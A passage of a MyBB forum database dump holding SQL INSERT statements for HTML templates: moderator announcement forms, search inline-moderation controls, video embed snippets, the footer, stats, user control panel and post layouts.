class=\"trow1\" valign=\"top\" width=\"25%\"><strong>{$lang->title}</strong></td>\n <td class=\"trow1\" valign=\"top\" width=\"75%\"><input type=\"text\" class=\"textbox\" name=\"title\" size=\"40\" value=\"{$title}\" /></td>\n </tr>\n <tr>\n <td class=\"trow1\" colspan=\"1\" valign=\"top\" width=\"25%\"><strong>{$lang->start_date}</strong></td>\n <td class=\"trow1\" valign=\"top\" width=\"75%\">\n <select name=\"starttime_day\">\n {$startdateday}\n </select>\n &nbsp;\n <select name=\"starttime_month\">\n {$startdatemonth}\n </select>\n &nbsp;\n <input type=\"text\" name=\"starttime_year\" value=\"{$startdateyear}\" size=\"4\" maxlength=\"4\"/>\n - {$lang->time} <input type=\"text\" name=\"starttime_time\" value=\"{$starttime_time}\" size=\"10\" />\n </td>\n </tr>\n <tr>\n <td class=\"trow1\" colspan=\"1\" valign=\"top\" width=\"25%\"><strong>{$lang->end_date}</strong></td>\n <td class=\"trow1\" valign=\"top\" width=\"75%\">\n <input type=\"radio\" name=\"endtime_type\" value=\"1\"{$end_type_sel[\'finite\']} />\n <select name=\"endtime_day\">\n {$enddateday}\n </select>\n &nbsp;\n <select name=\"endtime_month\">\n {$enddatemonth}\n </select>\n &nbsp;\n <input type=\"text\" name=\"endtime_year\" value=\"{$enddateyear}\" size=\"4\" maxlength=\"4\"/>\n - {$lang->time} <input type=\"text\" name=\"endtime_time\" value=\"{$endtime_time}\" size=\"10\" />\n <br /><input type=\"radio\" name=\"endtime_type\" value=\"2\"{$end_type_sel[\'infinite\']} /> {$lang->never}\n </td>\n </tr>\n <tr>\n <td class=\"trow1\" valign=\"top\" width=\"25%\"><strong>{$lang->announcement}</strong><br />{$smilieinserter}</td>\n <td class=\"trow1\" valign=\"top\" width=\"75%\"><textarea id=\"message\" name=\"message\" rows=\"20\" cols=\"70\">{$message}</textarea>{$codebuttons}</td>\n </tr>\n <tr>\n <td class=\"trow1\" valign=\"top\" width=\"25%\"><strong>{$lang->allow_html}</strong></td>\n <td class=\"trow1\" valign=\"top\" width=\"75%\"><label><input type=\"radio\" name=\"allowhtml\" value=\"1\"{$html_sel[\'yes\']} />&nbsp;{$lang->yes}</label> &nbsp;&nbsp;<label><input type=\"radio\" name=\"allowhtml\" value=\"0\"{$html_sel[\'no\']} />&nbsp;{$lang->no}</label></td>\n </tr>\n <tr>\n <td class=\"trow1\" valign=\"top\" width=\"25%\"><strong>{$lang->allow_mycode}</strong></td>\n <td class=\"trow1\" valign=\"top\" width=\"75%\"><label><input type=\"radio\" name=\"allowmycode\" value=\"1\"{$mycode_sel[\'yes\']} />&nbsp;{$lang->yes}</label> &nbsp;&nbsp;<label><input type=\"radio\" name=\"allowmycode\" value=\"0\"{$mycode_sel[\'no\']} />&nbsp;{$lang->no}</label></td>\n </tr>\n <tr>\n <td class=\"trow1\" valign=\"top\" width=\"25%\"><strong>{$lang->allow_smilies}</strong></td>\n <td class=\"trow1\" valign=\"top\" width=\"75%\"><label><input type=\"radio\" name=\"allowsmilies\" value=\"1\"{$smilies_sel[\'yes\']} />&nbsp;{$lang->yes}</label> &nbsp;&nbsp;<label><input type=\"radio\" name=\"allowsmilies\" value=\"0\"{$smilies_sel[\'no\']} />&nbsp;{$lang->no}</label></td>\n </tr>\n </table>\n <br />\n <div align=\"center\">\n <input type=\"submit\" class=\"button\" name=\"Add Announcement\" value=\"{$lang->add_announcement}\" />&nbsp;&nbsp;\n <input type=\"reset\" class=\"button\" name=\"Reset\" value=\"{$lang->reset}\" />\n </div>\n </td>\n </tr>\n </table>\n </form>\n {$footer}\n</body>\n</html>', '-2', '1405', '', '1339729416'); INSERT INTO mybb_templates VALUES('572', 'modcp_announcements_edit', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->manage_announcement}</title>\n{$headerinclude}\n</head>\n<body>\n {$header}\n <form action=\"modcp.php\" method=\"post\" enctype=\"multipart/form-data\">\n <input type=\"hidden\" name=\"action\" value=\"do_edit_announcement\" />\n <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n <input type=\"hidden\" name=\"fid\" value=\"{$announcement[\'fid\']}\" />\n <input type=\"hidden\" name=\"aid\" value=\"{$aid}\" />\n <table width=\"100%\" border=\"0\" align=\"center\">\n <tr>\n {$modcp_nav}\n <td valign=\"top\">\n {$errors}\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\" colspan=\"6\"><strong>{$lang->edit_announcement}</strong></td>\n </tr>\n <tr>\n <td class=\"trow1\" valign=\"top\" width=\"25%\"><strong>{$lang->title}</strong></td>\n <td class=\"trow1\" valign=\"top\" width=\"75%\"><input type=\"text\" class=\"textbox\" name=\"title\" size=\"40\" value=\"{$title}\" /></td>\n </tr>\n <tr>\n <td class=\"trow1\" colspan=\"1\" valign=\"top\" width=\"25%\"><strong>{$lang->start_date}</strong></td>\n <td class=\"trow1\" valign=\"top\" width=\"75%\">\n <select name=\"starttime_day\">\n {$startdateday}\n </select>\n &nbsp;\n <select name=\"starttime_month\">\n {$startdatemonth}\n </select>\n &nbsp;\n <input type=\"text\" name=\"starttime_year\" value=\"{$startdateyear}\" size=\"4\" maxlength=\"4\"/>\n - {$lang->time} <input type=\"text\" name=\"starttime_time\" value=\"{$starttime_time}\" size=\"10\" />\n </td>\n </tr>\n <tr>\n <td class=\"trow1\" colspan=\"1\" valign=\"top\" width=\"25%\"><strong>{$lang->end_date}</strong></td>\n <td class=\"trow1\" valign=\"top\" width=\"75%\">\n <input type=\"radio\" name=\"endtime_type\" value=\"1\"{$end_type_sel[\'finite\']} />\n <select name=\"endtime_day\">\n {$enddateday}\n </select>\n &nbsp;\n <select name=\"endtime_month\">\n {$enddatemonth}\n </select>\n &nbsp;\n <input type=\"text\" name=\"endtime_year\" value=\"{$enddateyear}\" size=\"4\" maxlength=\"4\"/>\n - {$lang->time} <input type=\"text\" name=\"endtime_time\" value=\"{$endtime_time}\" size=\"10\" />\n <br /><input type=\"radio\" name=\"endtime_type\" value=\"2\"{$end_type_sel[\'infinite\']} /> {$lang->never}\n </td>\n </tr>\n <tr>\n <td class=\"trow1\" valign=\"top\" width=\"25%\"><strong>{$lang->announcement}</strong><br />{$smilieinserter}</td>\n <td class=\"trow1\" valign=\"top\" width=\"75%\"><textarea id=\"message\" name=\"message\" rows=\"20\" cols=\"70\">{$message}</textarea>{$codebuttons}</td>\n </tr>\n <tr>\n <td class=\"trow1\" valign=\"top\" width=\"25%\"><strong>{$lang->allow_html}</strong></td>\n <td class=\"trow1\" valign=\"top\" width=\"75%\"><label><input type=\"radio\" name=\"allowhtml\" value=\"1\"{$html_sel[\'yes\']} />&nbsp;{$lang->yes}</label> &nbsp;&nbsp;<label><input type=\"radio\" name=\"allowhtml\" value=\"0\"{$html_sel[\'no\']} />&nbsp;{$lang->no}</label></td>\n </tr>\n <tr>\n <td class=\"trow1\" valign=\"top\" width=\"25%\"><strong>{$lang->allow_mycode}</strong></td>\n <td class=\"trow1\" valign=\"top\" width=\"75%\"><label><input type=\"radio\" name=\"allowmycode\" value=\"1\"{$mycode_sel[\'yes\']} />&nbsp;{$lang->yes}</label> &nbsp;&nbsp;<label><input type=\"radio\" name=\"allowmycode\" value=\"0\"{$mycode_sel[\'no\']} />&nbsp;{$lang->no}</label></td>\n </tr>\n <tr>\n <td class=\"trow1\" valign=\"top\" width=\"25%\"><strong>{$lang->allow_smilies}</strong></td>\n <td class=\"trow1\" valign=\"top\" width=\"75%\"><label><input type=\"radio\" name=\"allowsmilies\" value=\"1\"{$smilies_sel[\'yes\']} />&nbsp;{$lang->yes}</label> &nbsp;&nbsp;<label><input type=\"radio\" name=\"allowsmilies\" value=\"0\"{$smilies_sel[\'no\']} />&nbsp;{$lang->no}</label></td>\n </tr>\n </table>\n <br />\n <div align=\"center\">\n <input type=\"submit\" class=\"button\" name=\"Edit Announcement\" value=\"{$lang->edit_announcement}\" />&nbsp;&nbsp;\n <input type=\"reset\" class=\"button\" name=\"Reset\" value=\"{$lang->reset}\" />\n </div>\n </td>\n </tr>\n </table>\n </form>\n {$footer}\n</body>\n</html>', '-2', '1405', '', '1339729416'); INSERT INTO mybb_templates VALUES('573', 'modcp_announcements_delete', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->delete_announcement}</title>\n{$headerinclude}\n</head>\n<body>\n {$header}\n <form action=\"modcp.php\" method=\"post\" enctype=\"multipart/form-data\">\n <input type=\"hidden\" name=\"action\" value=\"do_delete_announcement\" />\n <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n <input type=\"hidden\" name=\"fid\" value=\"{$announcement_fid}\" />\n <table width=\"100%\" border=\"0\" align=\"center\">\n <tr>\n {$modcp_nav}\n <td valign=\"top\">\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\" colspan=\"2\"><strong>{$announcement[\'subject\']} - {$lang->delete_announcement}</strong></td>\n </tr>\n <tr>\n <td class=\"trow1\" colspan=\"2\" align=\"center\">{$lang->confirm_delete_announcement}</td>\n </tr>\n </table>\n <br />\n <div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->delete_announcement}\" /></div>\n <input type=\"hidden\" name=\"aid\" value=\"{$aid}\" />\n </form>\n </td>\n </tr>\n </table>\n </form>\n {$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('574', 'search_orderarrow', '<span class=\"smalltext\">[<a href=\"{$sorturl}&amp;sortby={$sortby}&amp;order={$oppsortnext}\">{$oppsort}</a>]</span>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('575', 'search_results_posts_inlinecheck', '<td class=\"{$bgcolor}\" align=\"center\" style=\"white-space: nowrap\"><input type=\"checkbox\" class=\"checkbox\" name=\"inlinemod_{$post[\'pid\']}\" id=\"inlinemod_{$post[\'pid\']}\" value=\"1\" style=\"vertical-align: middle;\" {$inlinecheck} /></td>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('576', 'search_results_posts_nocheck', '<td class=\"{$bgcolor}\" align=\"center\" style=\"white-space: nowrap\">&nbsp;</td>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('577', 'search_results_threads_inlinecheck', '<td class=\"{$bgcolor}\" align=\"center\" style=\"white-space: nowrap\"><input type=\"checkbox\" class=\"checkbox\" name=\"inlinemod_{$thread[\'tid\']}\" id=\"inlinemod_{$thread[\'tid\']}\" value=\"1\" style=\"vertical-align: middle;\" {$inlinecheck} /></td>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('578', 'search_results_threads_nocheck', '<td class=\"{$bgcolor}\" align=\"center\" style=\"white-space: nowrap\">&nbsp;</td>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('579', 'search_results_inlinemodcol', '<td class=\"tcat\" align=\"center\" width=\"1\"><input type=\"checkbox\" name=\"allbox\" onclick=\"inlineModeration.checkAll(this)\" /></td>', '-2', '1408', '', '1339729416'); INSERT INTO mybb_templates VALUES('580', 'search_results_posts_inlinemoderation_custom', '<optgroup label=\"{$lang->custom_mod_tools}\">{$customposttools}</optgroup>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('581', 'search_results_posts_inlinemoderation_custom_tool', '<option value=\"{$tool[\'tid\']}\">{$tool[\'name\']}</option>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('582', 'search_results_posts_inlinemoderation', '<script type=\"text/javascript\" src=\"jscripts/inline_moderation.js?ver=1600\"></script>\n<form action=\"moderation.php\" method=\"post\" style=\"margin-top: 0; margin-bottom: 0;\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<input type=\"hidden\" name=\"tid\" value=\"0\" />\n<input type=\"hidden\" name=\"searchid\" value=\"{$sid}\" />\n<input type=\"hidden\" name=\"modtype\" value=\"inlinepost\" />\n<span class=\"smalltext\"><strong>{$lang->inline_post_moderation}</strong></span>\n<select name=\"action\">\n<optgroup label=\"{$lang->standard_mod_tools}\">\n <option value=\"multideleteposts\">{$lang->inline_delete_posts}</option>\n <option value=\"multiapproveposts\">{$lang->inline_approve_posts}</option>\n <option value=\"multiunapproveposts\">{$lang->inline_unapprove_posts}</option>\n</optgroup>\n{$customposttools}\n</select>\n<input type=\"submit\" class=\"button\" name=\"go\" value=\"{$lang->go} ({$inlinecount})\" id=\"inline_go\" />&nbsp;\n<input type=\"button\" class=\"button\" onclick=\"javascript:inlineModeration.clearChecked();\" value=\"{$lang->clear}\" />\n<input type=\"hidden\" name=\"url\" value=\"{$return_url}\" />\n<input type=\"hidden\" name=\"inlinetype\" value=\"search\" />\n</form>\n<script type=\"text/javascript\">\n<!--\n var go_text = \"{$lang->inline_go}\";\n var all_text = \"{$postcount}\";\n var inlineType = \"search\";\n var inlineId = \"{$sid}\";\n// -->\n</script><br />', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('583', 'search_results_threads_inlinemoderation_custom', '<optgroup label=\"{$lang->custom_mod_tools}\">{$customthreadtools}</optgroup>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('584', 'search_results_threads_inlinemoderation_custom_tool', '<option value=\"{$tool[\'tid\']}\">{$tool[\'name\']}</option>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('585', 'search_results_threads_inlinemoderation', '<script type=\"text/javascript\" src=\"jscripts/inline_moderation.js?ver=1600\"></script>\n <form action=\"moderation.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<input type=\"hidden\" name=\"fid\" value=\"0\" />\n<input type=\"hidden\" name=\"searchid\" value=\"{$sid}\" />\n<input type=\"hidden\" name=\"modtype\" value=\"inlinethread\" />\n<span class=\"smalltext\"><strong>{$lang->inline_thread_moderation}</strong></span>\n<select name=\"action\">\n <optgroup label=\"{$lang->standard_mod_tools}\">\n <option value=\"multiclosethreads\">{$lang->close_threads}</option>\n <option value=\"multiopenthreads\">{$lang->open_threads}</option>\n <option value=\"multistickthreads\">{$lang->stick_threads}</option>\n <option value=\"multiunstickthreads\">{$lang->unstick_threads}</option>\n <option value=\"multideletethreads\">{$lang->delete_threads}</option>\n <option value=\"multimovethreads\">{$lang->move_threads}</option>\n <option value=\"multiapprovethreads\">{$lang->approve_threads}</option>\n <option value=\"multiunapprovethreads\">{$lang->unapprove_threads}</option>\n </optgroup>\n {$customthreadtools}\n</select>\n<input type=\"submit\" class=\"button\" name=\"go\" value=\"{$lang->inline_go} ({$inlinecount})\" id=\"inline_go\" />&nbsp;\n<input type=\"button\" onclick=\"javascript:inlineModeration.clearChecked();\" value=\"{$lang->clear}\" class=\"button\" />\n<input type=\"hidden\" name=\"url\" value=\"{$return_url}\" />\n<input type=\"hidden\" name=\"inlinetype\" value=\"search\" />\n</form>\n<script type=\"text/javascript\">\n<!--\n var go_text = \"{$lang->inline_go}\";\n var all_text = \"{$threadcount}\";\n var inlineType = \"search\";\n var inlineId = \'{$sid}\';\n// -->\n</script>\n<br />', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('586', 'video_metacafe_embed', '<embed src=\"http://www.metacafe.com/fplayer/{$id}/{$title}.swf\" width=\"400\" height=\"345\" wmode=\"transparent\" allowFullScreen=\"true\" allowScriptAccess=\"always\" name=\"Metacafe_{$id}\" pluginspage=\"http://www.macromedia.com/go/getflashplayer\" type=\"application/x-shockwave-flash\"></embed>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('587', 'video_dailymotion_embed', '<div><object width=\"420\" height=\"339\"><param name=\"movie\" value=\"http://www.dailymotion.com/swf/{$id}\" /><param name=\"allowFullScreen\" value=\"true\" /><param name=\"allowScriptAccess\" value=\"always\" /><embed src=\"http://www.dailymotion.com/swf/{$id}\" type=\"application/x-shockwave-flash\" width=\"420\" height=\"339\" allowFullScreen=\"true\" allowScriptAccess=\"always\"></embed></object></div>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('588', 'video_myspacetv_embed', '<object width=\"425px\" height=\"360px\"><param name=\"allowFullScreen\" value=\"true\"/><param name=\"wmode\" value=\"transparent\"/><param name=\"movie\" value=\"http://mediaservices.myspace.com/services/media/embed.aspx/m={$id},t=1,mt=video\"/><embed src=\"http://mediaservices.myspace.com/services/media/embed.aspx/m={$id},t=1,mt=video\" width=\"425\" height=\"360\" allowFullScreen=\"true\" type=\"application/x-shockwave-flash\" wmode=\"transparent\"></embed></object>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('589', 'video_youtube_embed', '<object type=\"application/x-shockwave-flash\" class=\"video_embed\" style=\"width: 450px; height: 366px;\" data=\"http://www.youtube.com/v/{$id}\"><param name=\"movie\" value=\"http://www.youtube.com/v/{$id}\" /></object>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('590', 'video_vimeo_embed', '<object width=\"400\" height=\"230\"><param name=\"allowfullscreen\" value=\"true\" /><param name=\"allowscriptaccess\" value=\"always\" /><param name=\"movie\" value=\"http://vimeo.com/moogaloop.swf?clip_id={$id}&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1\" /><embed src=\"http://vimeo.com/moogaloop.swf?clip_id={$id}&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1\" type=\"application/x-shockwave-flash\" allowfullscreen=\"true\" allowscriptaccess=\"always\" width=\"400\" height=\"230\"></embed></object>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('591', 'video_yahoo_embed', '<div><object width=\"512\" height=\"322\"><param name=\"movie\" value=\"http://d.yimg.com/static.video.yahoo.com/yep/YV_YEP.swf?ver=2.2.40\" /><param name=\"allowFullScreen\" value=\"true\" /><param name=\"AllowScriptAccess\" VALUE=\"always\" /><param name=\"bgcolor\" value=\"#000000\" /><param name=\"flashVars\" value=\"id={$id}&vid={$vid}&lang=en-us&intl=us&embed=1\" /><embed src=\"http://d.yimg.com/static.video.yahoo.com/yep/YV_YEP.swf?ver=2.2.40\" type=\"application/x-shockwave-flash\" width=\"512\" height=\"322\" allowFullScreen=\"true\" AllowScriptAccess=\"always\" bgcolor=\"#000000\" flashVars=\"id={$id}&vid={$vid}&lang=en-us&intl=us&embed=1\"></embed></object></div>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('1882', 'footer', ' <br />\n <div class=\"bottommenu\">\n <div class=\"float_right\">{$lang_select}</div>\n <div>\n <span class=\"smalltext\"><a href=\"{$mybb->settings[\'contactlink\']}\">{$lang->bottomlinks_contactus}</a> | <a href=\"{$mybb->settings[\'homeurl\']}\">{$mybb->settings[\'homename\']}</a> | <a href=\"#top\">{$lang->bottomlinks_returntop}</a> | <a href=\"#content\">{$lang->bottomlinks_returncontent}</a> | <a href=\"<archive_url>\">{$lang->bottomlinks_litemode}</a> | <a href=\"{$mybb->settings[\'bburl\']}/misc.php?action=syndication\">{$lang->bottomlinks_syndication}</a></span>\n </div>\n </div>\n </div>\n <hr class=\"hidden\" />\n <div id=\"copyright\">\n <div id=\"debug\"><debugstuff></div>\n <!-- MyBB is free software developed and maintained by a volunteer community. \n It would be much appreciated by the MyBB Group if you left the full copyright and \"powered by\" notice intact, \n to show your support for MyBB. If you choose to remove or modify the copyright below, \n you may be refused support on the MyBB Community Forums.\n \n This is free software, support us and we\'ll support you. -->\n{$lang->powered_by} <a href=\"http://mybb.com/\" target=\"_blank\">MyBB{$mybbversion}</a>, &copy; 2002-{$copy_year} <a href=\"http://mybb.com/\" target=\"_blank\">MyBB Group</a>.<br />\n <!-- End powered by -->\n <br />\n<br class=\"clear\" />\n<!-- The following piece of code allows MyBB to run scheduled tasks. DO NOT REMOVE -->{$task_image}<!-- End task image code -->\n{$auto_dst_detection}\n{$affiliates}\n </div>\n </div>', '1', '1608', '', '1339745376'); INSERT INTO mybb_templates VALUES('1990', 'stats', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->board_stats}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->board_stats}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" width=\"50%\"><strong>{$lang->totals}</strong></td>\n<td class=\"tcat\" width=\"50%\"><strong>{$lang->averages}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" valign=\"top\">\n{$lang->posts} <strong>{$stats[\'numposts\']}</strong><br />\n{$lang->threads} <strong>{$stats[\'numthreads\']}</strong><br />\n{$lang->members} <strong>{$stats[\'numusers\']}</strong>\n</td>\n<td class=\"trow1\" rowspan=\"3\" valign=\"top\">\n{$lang->ppd} <strong>{$postsperday}</strong><br />\n{$lang->tpd} <strong>{$threadsperday}</strong><br />\n{$lang->mpd} <strong>{$membersperday}</strong><br />\n{$lang->ppm} <strong>{$postspermember}</strong><br />\n{$lang->rpt} <strong>{$repliesperthread}</strong>\n</td>\n</tr>\n<tr>\n<td class=\"tcat\" valign=\"top\"><strong>{$lang->general}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\">\n{$lang->newest_member} {$stats[\'newest_user\']}<br />\n{$lang->members_posted} <strong>{$havepostedpercent}</strong><br />\n{$lang->todays_top_poster}<br />\n{$lang->popular_forum}\n</td>\n</tr>\n</table>\n\n\n<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->most_popular}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" width=\"50%\"><strong>{$lang->most_replied_threads}</strong></td>\n<td class=\"tcat\" width=\"50%\"><strong>{$lang->most_viewed_threads}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" valign=\"top\">{$mostreplies}</td>\n<td class=\"trow1\" valign=\"top\">{$mostviews}</td>\n</tr>\n</table>\n{$footer}\n</body>\n</html>', '8', '1608', '', '1343954655'); INSERT INTO mybb_templates VALUES('2010', 'usercp', '<html>\n<head>\n<title>{$lang->user_cp}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"{$colspan}\"><strong>{$lang->account_summary}</strong></td>\n</tr>\n<tr>\n{$avatar}\n<td class=\"trow2\">\n<span class=\"largetext\">{$username}</span><br />\n<strong>{$lang->postnum}</strong> <a href=\"search.php?action=finduser&amp;uid={$mybb->user[\'uid\']}\">{$mybb->user[\'posts\']}</a> {$lang->posts_day}<br />\n{$reputation}\n<strong>{$lang->email}</strong> {$mybb->user[\'email\']}<br />\n<strong>{$lang->registration_date}</strong> {$regdate}<br />\n<strong>{$lang->primary_usergroup}</strong> {$usergroup}<br />\n{$referral_info}\n</td>\n</tr>\n</table>\n{$latest_subscribed}\n{$latest_threads}\n{$latest_warnings}\n{$user_notepad}\n</td>\n</tr>\n</table>\n{$footer}\n</body>\n</html>', '8', '1608', '', '1345218535'); INSERT INTO mybb_templates VALUES('1867', 'postbit_classic', '{$ignore_bit}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"{$post_extra_style} {$post_visibility}{$post[\'hellban_css\']}\" id=\"post_{$post[\'pid\']}\">\n <tr>\n <td class=\"{$altbg}\" width=\"15%\" valign=\"top\" style=\"white-space: nowrap; text-align: center;\"><a name=\"pid{$post[\'pid\']}\" id=\"pid{$post[\'pid\']}\"></a>\n <strong><span class=\"largetext\">{$post[\'profilelink\']}</span></strong> {$post[\'onlinestatus\']}<br />\n <span class=\"smalltext\">\n {$post[\'usertitle\']}<br />\n {$post[\'userstars\']}\n {$post[\'groupimage\']}\n {$post[\'useravatar\']}<br />\n {$post[\'user_details\']}<!-- postbit_achivements -->{$post[\'achivementspostbit\']}<!-- /postbit_achivements -->\n </span>\n </td>\n <td class=\"{$altbg}\" valign=\"top\">\n <table width=\"100%\">\n <tr><td>{$post[\'posturl\']}<span class=\"smalltext\"><strong>{$post[\'icon\']}{$post[\'subject\']} {$post[\'subject_extra\']}</strong></span>\n <br />\n <div id=\"pid_{$post[\'pid\']}\" class=\"post_body\">\n {$post[\'message\']}{$post[\'hellban_message\']}\n </div>\n {$post[\'attachments\']}\n {$post[\'signature\']}\n <div style=\"text-align: right; vertical-align: bottom;\" id=\"post_meta_{$post[\'pid\']}\">\n <div id=\"edited_by_{$post[\'pid\']}\">{$post[\'editedmsg\']}</div>\n {$post[\'iplogged\']}\n </div>\n </td></tr>\n </table>\n</td>\n</tr>\n<tr>\n <td class=\"{$altbg}\" style=\"white-space: nowrap; text-align: center; vertical-align: middle;\"><span class=\"smalltext\">{$post[\'postdate\']} {$post[\'posttime\']}</span></td>\n <td class=\"{$altbg}\" style=\"vertical-align: middle;\">\n <table width=\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">\n <tr valign=\"bottom\">\n <td align=\"left\" ><span class=\"smalltext\">{$post[\'button_email\']}{$post[\'button_pm\']}{$post[\'button_www\']}{$post[\'button_find\']}{$post[\'button_rep\']}</span></td>\n <td align=\"right\">{$post[\'button_edit\']}{$post[\'button_quickdelete\']}{$post[\'button_quote\']}{$post[\'button_multiquote\']}{$post[\'button_report\']}{$post[\'button_warn\']}{$post[\'button_reply_pm\']}{$post[\'button_replyall_pm\']}{$post[\'button_forward_pm\']}{$post[\'button_delete_pm\']}</td>\n </tr>\n </table>\n </td>\n</tr>\n</table>{$post[inline_ad]}', '1', '0', '', '1345218566'); INSERT INTO mybb_templates VALUES('1866', 'postbit', '{$ignore_bit}\n<a name=\"pid{$post[\'pid\']}\" id=\"pid{$post[\'pid\']}\"></a>\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"{$post_extra_style} {$post_visibility}{$post[\'hellban_css\']}\" id=\"post_{$post[\'pid\']}\">\n <tbody>\n <tr>\n <td class=\"tcat\">\n <div class=\"float_left smalltext\">\n {$post[\'postdate\']}, {$post[\'posttime\']} <span id=\"edited_by_{$post[\'pid\']}\">{$post[\'editedmsg\']}</span>\n </div>\n {$post[\'posturl\']}\n </td>\n </tr>\n\n <tr>\n <td class=\"trow1 {$unapproved_shade}\">\n <table cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%;\">\n <tr>\n <td class=\"post_avatar\" width=\"1\" style=\"{$post[\'avatar_padding\']}\">\n {$post[\'useravatar\']}\n </td>\n <td class=\"post_author\">\n <strong><span class=\"largetext\">{$post[\'profilelink\']}</span></strong> {$post[\'onlinestatus\']}<br />\n <span class=\"smalltext\">\n {$post[\'usertitle\']}<br />\n {$post[\'userstars\']}\n {$post[\'groupimage\']}\n </span>\n </td>\n <td class=\"smalltext post_author_info\" width=\"165\">\n {$post[\'user_details\']}<!-- postbit_achivements -->{$post[\'achivementspostbit\']}<!-- /postbit_achivements -->\n </td>\n </tr>\n </table>\n </td>\n </tr>\n\n <tr>\n <td class=\"trow2 post_content {$unapproved_shade}\">\n <span class=\"smalltext\"><strong>{$post[\'icon\']}{$post[\'subject\']} {$post[\'subject_extra\']}</strong></span>\n\n <div class=\"post_body\" id=\"pid_{$post[\'pid\']}\">\n {$post[\'message\']}{$post[\'hellban_message\']}\n </div>\n {$post[\'attachments\']}\n {$post[\'signature\']}\n\n <div class=\"post_meta\" id=\"post_meta_{$post[\'pid\']}\">\n {$post[\'iplogged\']}\n </div>\n </td>\n </tr>\n\n <tr>\n <td class=\"trow1 post_buttons {$unapproved_shade}\">\n <div class=\"author_buttons float_left\">\n {$post[\'button_email\']}{$post[\'button_pm\']}{$post[\'button_www\']}{$post[\'button_find\']}{$post[\'button_rep\']}\n </div>\n <div class=\"post_management_buttons float_right\">{$post[\'button_edit\']}{$post[\'button_quickdelete\']}{$post[\'button_quote\']}{$post[\'button_multiquote\']}{$post[\'button_report\']}{$post[\'button_warn\']}{$post[\'button_reply_pm\']}{$post[\'button_replyall_pm\']}{$post[\'button_forward_pm\']}{$post[\'button_delete_pm\']}\n </div>\n </td>\n </tr>\n </tbody>\n</table>{$post[inline_ad]}', '1', '0', '', '1345218566'); INSERT INTO mybb_templates VALUES('1864', 'usercp', '<html>\n<head>\n<title>{$lang->user_cp}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"{$colspan}\"><strong>{$lang->account_summary}</strong></td>\n</tr>\n<tr>\n{$avatar}\n<td class=\"trow2\">\n<span class=\"largetext\">{$username}</span><br />\n<strong>{$lang->postnum}</strong> <a href=\"search.php?action=finduser&amp;uid={$mybb->user[\'uid\']}\">{$mybb->user[\'posts\']}</a> {$lang->posts_day}<br 